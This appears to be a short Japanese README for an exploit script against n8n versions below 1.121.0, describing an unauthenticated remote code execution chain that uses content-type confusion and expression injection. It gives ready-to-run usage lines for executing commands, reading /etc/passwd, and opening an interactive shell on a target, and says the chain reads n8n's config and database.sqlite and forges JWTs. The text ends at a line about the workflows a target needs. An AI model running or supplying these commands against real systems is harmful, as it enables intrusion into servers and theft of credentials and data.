
n8nにおける未認証リモートコード実行のためのエクスプロイトチェーン。コンテンツタイプの混乱と式インジェクションを組み合わせて、ファイルの読み取り、JWTの偽造、コマンドの実行を行います。
n8n < 1.121.0 における未認証RCEチェーン(CVSS 10.0)
/home/node/.n8n/config と database.sqlite を読み取るchild_process を介してコマンドを実行# コマンドを実行
python3 exploit.py http://target:5678 /form/test --cmd "id"
# ファイルを読み取る
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# 対話型シェル
python3 exploit.py http://target:5678 /form/test
ターゲットには以下のアクティブなワークフローが必要です: